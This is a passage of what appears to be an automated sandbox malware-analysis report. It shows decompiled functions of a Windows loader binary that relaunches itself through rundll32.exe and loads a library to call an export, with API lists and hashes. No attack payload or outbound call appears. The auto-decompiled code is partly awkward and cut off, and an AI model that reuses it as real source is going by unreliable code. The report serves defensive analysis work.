					_t59 = _t60 + _t56;
					__imp__GetNativeSystemInfo( &(_v620.dwXCountChars)); // executed
					_t34 = 9;
					if(_t34 != _v620.dwXCountChars || _t61 == 0x8664) {
						_t35 = 6;
						if(_t35 != _v620.dwXCountChars || _t61 == 0x200) {
							if(GetSystemDirectoryW( &_v532, 0xf6) == 0 || E0004384E( &_v532, 0x105, L"rundll32.exe", 0) < 0) {
								goto L12;
							} else {
								_t61 = __imp__Wow64EnableWow64FsRedirection;
								 *_t61(0);
								memset( &(_v620.lpReserved), 0, 0x40);
								_v620.cb = 0x44;
								_t47 = CreateProcessW( &_v532, GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v620,  &_v552); // executed
								if(_t47 == 0) {
									goto L12;
								} else {
									 *_t61(1);
									_t49 = WaitForSingleObject(_v552.hProcess, 0xffffffff);
									_t61 = CloseHandle;
									_t59 = _t49;
									CloseHandle(_v552);
									CloseHandle(_v552.hThread);
									if(_t49 != 0) {
										goto L12;
									} else {
										_t29 = 1;
									}
								}
							}
						} else {
							goto L12;
						}
					} else {
						goto L12;
					}
				}
				return E00041189(_t29, 0, _v8 ^ _t62, _t58, _t59, _t61);
			}
























                                                  0x000439e5
                                                  0x000439f7
                                                  0x000439fa
                                                  0x00043a03
                                                  0x00043a09
                                                  0x00043a0e
                                                  0x00043a17
                                                  0x00043a1e
                                                  0x00043a26
                                                  0x00043b45
                                                  0x00043b45
                                                  0x00043a38
                                                  0x00043a3a
                                                  0x00043a3d
                                                  0x00043a43
                                                  0x00043a49
                                                  0x00043a49
                                                  0x00043a52
                                                  0x00043a5a
                                                  0x00043a62
                                                  0x00043a72
                                                  0x00043a7a
                                                  0x00043a9c
                                                  0x00000000
                                                  0x00043ac1
                                                  0x00043ac1
                                                  0x00043ac8
                                                  0x00043ad4
                                                  0x00043af0
                                                  0x00043b08
                                                  0x00043b10
                                                  0x00000000
                                                  0x00043b12
                                                  0x00043b14
                                                  0x00043b1e
                                                  0x00043b2a
                                                  0x00043b30
                                                  0x00043b32
                                                  0x00043b3a
                                                  0x00043b3e
                                                  0x00000000
                                                  0x00043b40
                                                  0x00043b42
                                                  0x00043b42
                                                  0x00043b3e
                                                  0x00043b10
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00043a62
                                                  0x00043b55

                                                  APIs
                                                    • Part of subcall function 000429B3: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 000429E3
                                                    • Part of subcall function 000429B3: ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00042A03
                                                    • Part of subcall function 000429B3: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00042A1A
                                                    • Part of subcall function 000429B3: ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00042A37
                                                    • Part of subcall function 000429B3: CloseHandle.KERNELBASE(00000000), ref: 00042A48
                                                  • GetCurrentProcess.KERNEL32(?,00042411,000000C1,?,00000000), ref: 00043A17
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00043A1E
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00043A52
                                                  • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 00043A94
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00043AC8
                                                  • memset.MSVCRT ref: 00043AD4
                                                  • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00043AFA
                                                  • CreateProcessW.KERNEL32(?,00000000), ref: 00043B08
                                                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00043B14
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00043B1E
                                                  • CloseHandle.KERNEL32(?), ref: 00043B32
                                                  • CloseHandle.KERNEL32(?), ref: 00043B3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: Wow64$File$CloseHandleProcess$CreateEnableReadRedirectionSystem$CommandCurrentDirectoryInfoLineNativeObjectPointerSingleWaitmemset
                                                  • String ID: D$rundll32.exe
                                                  • API String ID: 446403646-895393680
                                                  • Opcode ID: 36541c026293007293856094d3e17a33549d2b7dc1d55c182e0dc21ab0f5a71c
                                                  • Instruction ID: ac9297e9a185aaca3b54fe5dcd82fd5d00cad80cb0155a2fc810b1f287447ebe
                                                  • Opcode Fuzzy Hash: 36541c026293007293856094d3e17a33549d2b7dc1d55c182e0dc21ab0f5a71c
                                                  • Instruction Fuzzy Hash: FE3189F294021D6EDB60ABA0DD8CBDEB7BCEB14750F0005B6A609E2051DB749EC4CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0004178C Relevance: 13.6, APIs: 9, Instructions: 143COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 111 4178c-417c9 call 41593 call 41e0c GetStartupInfoW 116 417ce-417d9 InterlockedCompareExchange 111->116 117 41903-41905 116->117 118 417df-417e1 116->118 119 41907-4190d 117->119 120 41912-4191d Sleep 117->120 121 417e2-417e9 118->121 119->121 120->116 122 41922-41929 _amsg_exit 121->122 123 417ef-417f6 121->123 127 4192f-4193c call 43dc5 122->127 124 42320 123->124 125 417fc-41815 call 41763 123->125 130 4232b-42333 124->130 131 419b8-419bf 125->131 132 4181b-41822 125->132 137 41942-4194c 127->137 138 41858-4185f 127->138 136 419c4-419c9 call 419ca 131->136 134 41824-41835 _initterm 132->134 135 4183f-41842 132->135 134->135 139 41844-41846 InterlockedExchange 135->139 140 4184c-41852 135->140 137->138 138->131 142 41865 138->142 139->140 140->127 140->138 144 41867-41871 142->144 146 41873-41877 144->146 147 418c8-418cb 144->147 146->130 148 4187d-4187f 146->148 149 418d2-418d8 147->149 150 418cd-418d0 147->150 148->144 151 418e7-418eb 149->151 152 418da-418de 149->152 150->146 150->149 154 42317 151->154 155 418f1-418fc call 41203 151->155 152->151 153 418e0-418e5 152->153 153->149 154->124 157 41901-4195c 155->157 159 4195e-41978 exit _XcptFilter 157->159 160 419aa-419af 157->160 160->136
                                                  C-Code - Quality: 82%
                                                  			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t28;
				signed int _t31;
				int* _t32;
				int _t33;
				int _t35;
				intOrPtr* _t36;
				void* _t42;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				intOrPtr _t51;
				long _t63;
				intOrPtr _t65;
				void* _t67;

				E00041593();
				_push(0x5c);
				_push(0x418a0);
				E00041E0C(__ebx, __edi, __esi);
				 *(_t67 - 0x1c) = 0;
				 *((intOrPtr*)(_t67 - 4)) = 0;
				GetStartupInfoW(_t67 - 0x6c);
				 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
				 *((intOrPtr*)(_t67 - 4)) = 1;
				_t63 =  *( *[fs:0x18] + 4);
				 *((intOrPtr*)(_t67 - 0x20)) = 0;
				while(1) {
					_t28 = InterlockedCompareExchange(0x45068, _t63, 0);
					if(_t28 == 0) {
						break;
					}
					__eflags = _t28 - _t63;
					if(__eflags != 0) {
						Sleep(0x3e8);
						continue;
					} else {
						_t65 = 1;
						 *((intOrPtr*)(_t67 - 0x20)) = 1;
					}
					L3:
					if( *0x45064 == _t65) {
						_push(0x1f);
						L00043E59();
						goto L6;
					} else {
						if( *0x45064 != 0) {
							 *0x453b4 = _t65;
							goto L6;
						} else {
							 *0x45064 = _t65;
							_t42 = E00041763(0x41890, 0x4189c); // executed
							if(_t42 != 0) {
								L33:
								 *((intOrPtr*)(_t67 - 4)) = 0xfffffffe;
								_t33 = 0xff;
								goto L34;
							} else {
								L6:
								if( *0x45064 == _t65) {
									_push(0x4188c);
									_push(0x41884); // executed
									L00041580(); // executed
									 *0x45064 = 2;
								}
								if( *((intOrPtr*)(_t67 - 0x20)) == 0) {
									InterlockedExchange(0x45068, 0);
								}
								if( *0x453b0 != 0) {
									_push(0x453b0);
									_t31 = E00043DC5(0, 0x45068, _t65, __eflags);
									__eflags = _t31;
									if(_t31 != 0) {
										 *0x453b0(0, 2, 0);
									}
								}
								_t32 = __imp___wcmdln;
								if( *_t32 == 0) {
									goto L33;
								} else {
									_t35 =  *_t32;
									while(1) {
										 *(_t67 - 0x24) = _t35;
										_t47 =  *_t35 & 0x0000ffff;
										if(_t47 <= 0x20) {
											goto L16;
										}
										L14:
										if(_t47 == 0x22) {
											__eflags =  *(_t67 - 0x1c);
											 *(_t67 - 0x1c) = 0 |  *(_t67 - 0x1c) == 0x00000000;
										}
										_t35 = _t35 + 2;
										continue;
										L16:
										__eflags = _t47;
										if(_t47 != 0) {
											__eflags =  *(_t67 - 0x1c);
											if( *(_t67 - 0x1c) != 0) {
												goto L14;
											} else {
												goto L18;
											}
											while(1) {
												L18:
												_t48 =  *_t35 & 0x0000ffff;
												__eflags = _t48;
												if(_t48 == 0) {
													break;
												}
												__eflags = _t48 - 0x20;
												if(_t48 <= 0x20) {
													_t35 = _t35 + 2;
													 *(_t67 - 0x24) = _t35;
													continue;
												}
												break;
											}
											__eflags =  *(_t67 - 0x40) & 0x00000001;
											if(( *(_t67 - 0x40) & 0x00000001) != 0) {
												_t49 =  *(_t67 - 0x3c) & 0x0000ffff;
											} else {
												_t49 = 0xa;
											}
											E00041203(0x40000, 0, _t35, _t49); // executed
											 *0x45078 = _t35;
											__eflags =  *0x45050;
											if( *0x45050 != 0) {
												_t33 =  *0x45078;
												L34:
												return E000419CA(_t33);
											} else {
												exit(_t35);
												_t36 =  *((intOrPtr*)(_t67 - 0x14));
												_t51 =  *((intOrPtr*)( *_t36));
												 *((intOrPtr*)(_t67 - 0x28)) = _t51;
												_push(_t36);
												_push(_t51);
												L00043D37();
												return _t36;
											}
											goto L38;
										}
										goto L18;
									}
								}
							}
						}
					}
					L38:
				}
				_t65 = 1;
				goto L3;
			}

















                                                  0x0004178c
                                                  0x00041791
                                                  0x00041793
                                                  0x00041798
                                                  0x0004179f
                                                  0x000417a2
                                                  0x000417a9
                                                  0x000417af
                                                  0x000417b6
                                                  0x000417c3
                                                  0x000417c6
                                                  0x000417ce
                                                  0x000417d1
                                                  0x000417d9
                                                  0x00000000
                                                  0x00000000
                                                  0x00041903
                                                  0x00041905
                                                  0x00041917
                                                  0x00000000
                                                  0x00041907
                                                  0x00041909
                                                  0x0004190a
                                                  0x0004190a
                                                  0x000417e2
                                                  0x000417e9
                                                  0x00041922
                                                  0x00041924
                                                  0x00000000
                                                  0x000417ef
                                                  0x000417f6
                                                  0x00042320
                                                  0x00000000
                                                  0x000417fc
                                                  0x000417fc
                                                  0x0004180c
                                                  0x00041815
                                                  0x000419b8
                                                  0x000419b8
                                                  0x000419bf
                                                  0x00000000
                                                  0x0004181b
                                                  0x0004181b
                                                  0x00041822
                                                  0x00041824
                                                  0x00041829
                                                  0x0004182e
                                                  0x00041835
                                                  0x00041835
                                                  0x00041842
                                                  0x00041846
                                                  0x00041846
                                                  0x00041852
                                                  0x0004192f
                                                  0x00041934
                                                  0x0004193a
                                                  0x0004193c
                                                  0x00041946
                                                  0x00041946
                                                  0x0004193c
                                                  0x00041858
                                                  0x0004185f
                                                  0x00000000
                                                  0x00041865
                                                  0x00041865
                                                  0x00041867
                                                  0x00041867
                                                  0x0004186a
                                                  0x00041871
                                                  0x00000000
                                                  0x00000000
                                                  0x00041873
                                                  0x00041877
                                                  0x0004232d
                                                  0x00042333
                                                  0x00042333
                                                  0x0004187e
                                                  0x00000000
                                                  0x000418c8
                                                  0x000418c8
                                                  0x000418cb
                                                  0x000418cd
                                                  0x000418d0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x000418d2
                                                  0x000418d2
                                                  0x000418d2
                                                  0x000418d5
                                                  0x000418d8
                                                  0x00000000
                                                  0x00000000
                                                  0x000418da
                                                  0x000418de
                                                  0x000418e1
                                                  0x000418e2
                                                  0x00000000
                                                  0x000418e2
                                                  0x00000000
                                                  0x000418de
                                                  0x000418e7
                                                  0x000418eb
                                                  0x00042317
                                                  0x000418f1
                                                  0x000418f3
                                                  0x000418f3
                                                  0x000418fc
                                                  0x00041951
                                                  0x00041956
                                                  0x0004195c
                                                  0x000419aa
                                                  0x000419c4
                                                  0x000419c9
                                                  0x0004195e
                                                  0x0004195f
                                                  0x00041965
                                                  0x0004196a
                                                  0x0004196c
                                                  0x0004196f
                                                  0x00041970
                                                  0x00041971
                                                  0x00041978
                                                  0x00041978
                                                  0x00000000
                                                  0x0004195c
                                                  0x00000000
                                                  0x000418cb
                                                  0x00041867
                                                  0x0004185f
                                                  0x00041815
                                                  0x000417f6
                                                  0x00000000
                                                  0x000417e9
                                                  0x000417e1
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00041593: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000415C1
                                                    • Part of subcall function 00041593: GetCurrentProcessId.KERNEL32 ref: 000415CD
                                                    • Part of subcall function 00041593: GetCurrentThreadId.KERNEL32 ref: 000415D5
                                                    • Part of subcall function 00041593: GetTickCount.KERNEL32 ref: 000415DD
                                                    • Part of subcall function 00041593: QueryPerformanceCounter.KERNEL32(?), ref: 000415E9
                                                  • GetStartupInfoW.KERNEL32(?,000418A0,0000005C), ref: 000417A9
                                                  • InterlockedCompareExchange.KERNEL32(00045068,?,00000000), ref: 000417D1
                                                  • _initterm.MSVCRT ref: 0004182E
                                                  • InterlockedExchange.KERNEL32(00045068,00000000), ref: 00041846
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: CurrentExchangeInterlockedTime$CompareCountCounterFileInfoPerformanceProcessQueryStartupSystemThreadTick_initterm
                                                  • String ID:
                                                  • API String ID: 812915189-0
                                                  • Opcode ID: d906088546440f99efed7d84eb5acbfbce91903abb6063d82af2d8ef9033d8d0
                                                  • Instruction ID: 58a536cab8a72b5b8348aa7d9e84125aaef6bd81343de58becbbe23c28ca4304
                                                  • Opcode Fuzzy Hash: d906088546440f99efed7d84eb5acbfbce91903abb6063d82af2d8ef9033d8d0
                                                  • Instruction Fuzzy Hash: CD41B0F9944305DFEB64AF50ED856FD77B4EB06702B50003EE102A6192DB785DC09B5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041B87 Relevance: 7.6, APIs: 5, Instructions: 98memorystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 161 41b87-41baa call 414bd 163 41baf-41bb4 161->163 164 41bf5-41bfa 163->164 165 41bb6-41bcd call 41c02 163->165 168 42494-424a2 call 4389e 165->168 169 41bd3-41bdd 165->169 173 424a7-424b0 FreeLibrary 168->173 171 42174-42179 169->171 172 41be3-41bf4 169->172 171->172 174 4217f-42182 171->174 172->164 174->172 175 42188-421b7 lstrlenW WideCharToMultiByte LocalAlloc 174->175 176 421bd-421d6 WideCharToMultiByte 175->176 177 4247f-42492 call 4389e 175->177 176->172 177->173
                                                  C-Code - Quality: 70%
                                                  			E00041B87(void* __edx, void* __eflags, intOrPtr _a4, char* _a8, int _a12, short* _a16, struct HINSTANCE__** _a20, intOrPtr* _a24, char** _a28) {
				int _v8;
				char _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _t36;
				intOrPtr _t38;
				long _t44;
				char* _t45;
				short* _t51;
				int _t61;

				_t57 = __edx;
				 *_a20 = 0;
				 *_a24 = 0;
				_v8 = 0;
				 *_a28 = 0; // executed
				_t36 = E000414BD(_a4, _a8); // executed
				_v16 = _t36;
				if(_t36 != 0) {
					_v12 = 0;
					_t38 = E00041C02(_t36, _a12,  &_v12);
					_v20 = _t38;
					if(_t38 == 0) {
						E0004389E(__edx, _a4, 0x400, _a8, _a12);
						goto L12;
					} else {
						_v8 = 1;
						if(_v12 != 0) {
							_t51 = _a16;
							if(_t51 == 0 ||  *_t51 == 0) {
								goto L3;
							} else {
								_t61 = lstrlenW(_t51) + 1;
								_t44 = WideCharToMultiByte(0, 0x400, _t51, _t61, 0, 0, 0, 0);
								_a12 = _t44;
								_t45 = LocalAlloc(0, _t44);
								_a8 = _t45;
								_push(0);
								if(_t45 == 0) {
									_push(_a16);
									_push(0x300);
									_push(_a4);
									E0004389E(_t57);
									_v8 = 0;
									L12:
									FreeLibrary(_v16);
									goto L4;
								} else {
									WideCharToMultiByte(0, 0x400, _a16, _t61, _t45, _a12, 0, ??);
									 *_a28 = _a8;
									goto L3;
								}
							}
							L13:
						} else {
							L3:
							 *_a20 = _v16;
							 *_a24 = _v20;
						}
					}
					L4:
				}
				return _v8;
				goto L13;
			}













                                                  0x00041b87
                                                  0x00041b9b
                                                  0x00041ba0
                                                  0x00041ba5
                                                  0x00041ba8
                                                  0x00041baa
                                                  0x00041baf
                                                  0x00041bb4
                                                  0x00041bbf
                                                  0x00041bc3
                                                  0x00041bc8
                                                  0x00041bcd
                                                  0x000424a2
                                                  0x00000000
                                                  0x00041bd3
                                                  0x00041bd3
                                                  0x00041bdd
                                                  0x00042174
                                                  0x00042179
                                                  0x00000000
                                                  0x00042188
                                                  0x00042195
                                                  0x000421a4
                                                  0x000421a8
                                                  0x000421ab
                                                  0x000421b1
                                                  0x000421b4
                                                  0x000421b7
                                                  0x0004247f
                                                  0x00042482
                                                  0x00042487
                                                  0x0004248a
                                                  0x0004248f
                                                  0x000424a7
                                                  0x000424aa
                                                  0x00000000
                                                  0x000421bd
                                                  0x000421cc
                                                  0x000421d4
                                                  0x00000000
                                                  0x000421d4
                                                  0x000421b7
                                                  0x00000000
                                                  0x00041be3
                                                  0x00041be3
                                                  0x00041be9
                                                  0x00041bf1
                                                  0x00041bf1
                                                  0x00041bdd
                                                  0x00041bf3
                                                  0x00041bf4
                                                  0x00041bfa
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 000414BD: LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 000414E7
                                                    • Part of subcall function 000414BD: RtlImageNtHeader.NTDLL(00000000), ref: 000414FC
                                                    • Part of subcall function 000414BD: SetProcessDEPPolicy.KERNEL32(00000003), ref: 00041513
                                                    • Part of subcall function 00041C02: lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00041C27
                                                    • Part of subcall function 00041C02: LocalAlloc.KERNEL32(00000000,00000002,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C38
                                                    • Part of subcall function 00041C02: WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?), ref: 00041C54
                                                    • Part of subcall function 00041C02: lstrlenA.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C5F
                                                    • Part of subcall function 00041C02: GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C79
                                                    • Part of subcall function 00041C02: LocalFree.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C87
                                                  • lstrlenW.KERNEL32(00000001,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 00042189
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,00000001,00000001,00000000,00000000,00000000,00000000), ref: 000421A4
                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 000421AB
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,00000000,00000001,00000000,?,00000000,00000000), ref: 000421CC
                                                  • FreeLibrary.KERNEL32(?,?,00000400,?,00000000,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 000424AA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocalMultiWidelstrlen$AllocFreeLibrary$AddressHeaderImageLoadPolicyProcProcess
                                                  • String ID:
                                                  • API String ID: 2400347670-0
                                                  • Opcode ID: c5bdf6414e5e32c1ca4cab167ab411f004adb9e01aa4cac2b3916581eebb3c09
                                                  • Instruction ID: 25a0d2a2cf8954c9bce27960f226653dd33a1734158ac318006a8988beec83c4
                                                  • Opcode Fuzzy Hash: c5bdf6414e5e32c1ca4cab167ab411f004adb9e01aa4cac2b3916581eebb3c09
                                                  • Instruction Fuzzy Hash: FC3126B5901218AFCB129F95CD84DEEBFB8FF49750F108065F905A7210D3709A91CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 000429B3 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 199 429b3-429ee CreateFileW 200 429f0-42a07 ReadFile 199->200 201 42a4f-42a5f call 41189 199->201 202 42a47-42a4e CloseHandle 200->202 203 42a09-42a12 200->203 202->201 203->202 205 42a14-42a23 SetFilePointer 203->205 205->202 207 42a25-42a3b ReadFile 205->207 207->202 208 42a3d-42a44 207->208 208->202
                                                  C-Code - Quality: 81%
                                                  			E000429B3(WCHAR* _a4) {
				signed int _v8;
				long _v12;
				void _v72;
				struct _OVERLAPPED* _v76;
				long _v80;
				signed short _v324;
				void _v328;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t17;
				int _t22;
				long _t25;
				int _t28;
				void* _t30;
				void* _t33;
				void* _t34;
				signed int _t37;

				_v8 =  *0x45040 ^ _t37;
				_v76 = 0;
				_t17 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t30 = _t17;
				if(_t30 == 0xffffffff) {
					L7:
					return E00041189(_v76, _t30, _v8 ^ _t37, _t33, _t34, 0);
				}
				_push(_t34);
				_t22 = ReadFile(_t30,  &_v72, 0x40,  &_v80, 0); // executed
				if(_t22 != 0 && 0x5a4d == _v72) {
					_t25 = SetFilePointer(_t30, _v12, 0, 0); // executed
					if(_t25 != 0xffffffff) {
						_t28 = ReadFile(_t30,  &_v328, 0xf8,  &_v80, 0); // executed
						if(_t28 != 0) {
							_v76 = _v324 & 0x0000ffff;
						}
					}
				}
				CloseHandle(_t30); // executed
				_pop(_t34);
				goto L7;
			}





















                                                  0x000429c5
                                                  0x000429e0
                                                  0x000429e3
                                                  0x000429e9
                                                  0x000429ee
                                                  0x00042a4f
                                                  0x00042a5f
                                                  0x00042a5f
                                                  0x000429f0
                                                  0x00042a03
                                                  0x00042a07
                                                  0x00042a1a
                                                  0x00042a23
                                                  0x00042a37
                                                  0x00042a3b
                                                  0x00042a44
                                                  0x00042a44
                                                  0x00042a3b
                                                  0x00042a23
                                                  0x00042a48
                                                  0x00042a4e
                                                  0x00000000

                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 000429E3
                                                  • ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00042A03
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00042A1A
                                                  • ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00042A37
                                                  • CloseHandle.KERNELBASE(00000000), ref: 00042A48
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: File$Read$CloseCreateHandlePointer
                                                  • String ID:
                                                  • API String ID: 3856724686-0
                                                  • Opcode ID: aafc404e23e49ad47332fe1b75e252dd3dd038bd0f8cff156fa0987f2a81a17b
                                                  • Instruction ID: 81b30619a5d1a3053106adc751af63b7f81899f0153c371ddcf437edf25ec908
                                                  • Opcode Fuzzy Hash: aafc404e23e49ad47332fe1b75e252dd3dd038bd0f8cff156fa0987f2a81a17b
                                                  • Instruction Fuzzy Hash: 5E1181B5600118BBD720EB65DC84FEE7BACEF45750F500161FA15E21A0D6B4DD86CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00041593 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00041593() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x45040;
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 != 0xbb40e64e) {
					if((0xffff0000 & _t14) == 0) {
						goto L1;
					}
					_t23 =  !_t14;
					 *0x45044 = _t23;
					return _t23;
				}
				L1:
				GetSystemTimeAsFileTime( &_v12);
				_t16 = GetCurrentProcessId();
				_t17 = GetCurrentThreadId();
				_t18 = GetTickCount();
				QueryPerformanceCounter( &_v20);
				_t22 = _v16 ^ _v20.LowPart;
				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
				if(_t32 == 0xbb40e64e || ( *0x45040 & 0xffff0000) == 0) {
					_t32 = 0xbb40e64f;
				}
				 *0x45040 = _t32;
				 *0x45044 =  !_t32;
				return _t22;
			}













                                                  0x0004159b
                                                  0x000415a0
                                                  0x000415a4
                                                  0x000415b6
                                                  0x00042561
                                                  0x00000000
                                                  0x00000000
                                                  0x00042567
                                                  0x00042569
                                                  0x00000000
                                                  0x00042569
                                                  0x000415bc
                                                  0x000415c1
                                                  0x000415cd
                                                  0x000415d5
                                                  0x000415dd
                                                  0x000415e9
                                                  0x000415f2
                                                  0x000415f5
                                                  0x000415f9
                                                  0x00041616
                                                  0x00041616
                                                  0x00041603
                                                  0x0004160b
                                                  0x00000000

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000415C1
                                                  • GetCurrentProcessId.KERNEL32 ref: 000415CD
                                                  • GetCurrentThreadId.KERNEL32 ref: 000415D5
                                                  • GetTickCount.KERNEL32 ref: 000415DD
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 000415E9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                  • String ID:
                                                  • API String ID: 1445889803-0
                                                  • Opcode ID: 937273a3c8b1958c1f60650467ab4cb5aa303aa6c972e9c2e6c977c19cd4b52b
                                                  • Instruction ID: e7bc8aadafea34ca16ac26b10458200d7b5481a1b1fc45b561e03c38f7da7dc7
                                                  • Opcode Fuzzy Hash: 937273a3c8b1958c1f60650467ab4cb5aa303aa6c972e9c2e6c977c19cd4b52b
                                                  • Instruction Fuzzy Hash: CB1108FEC00114ABDB209BB4DE486EEB7F4FB09342F560421D905E7215D7789D808B88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00041189 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E00041189(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr* _t26;

				if(__ecx !=  *0x45040) {
					 *0x45180 = __eax;
					 *0x4517c = __ecx;
					 *0x45178 = __edx;
					 *0x45174 = __ebx;
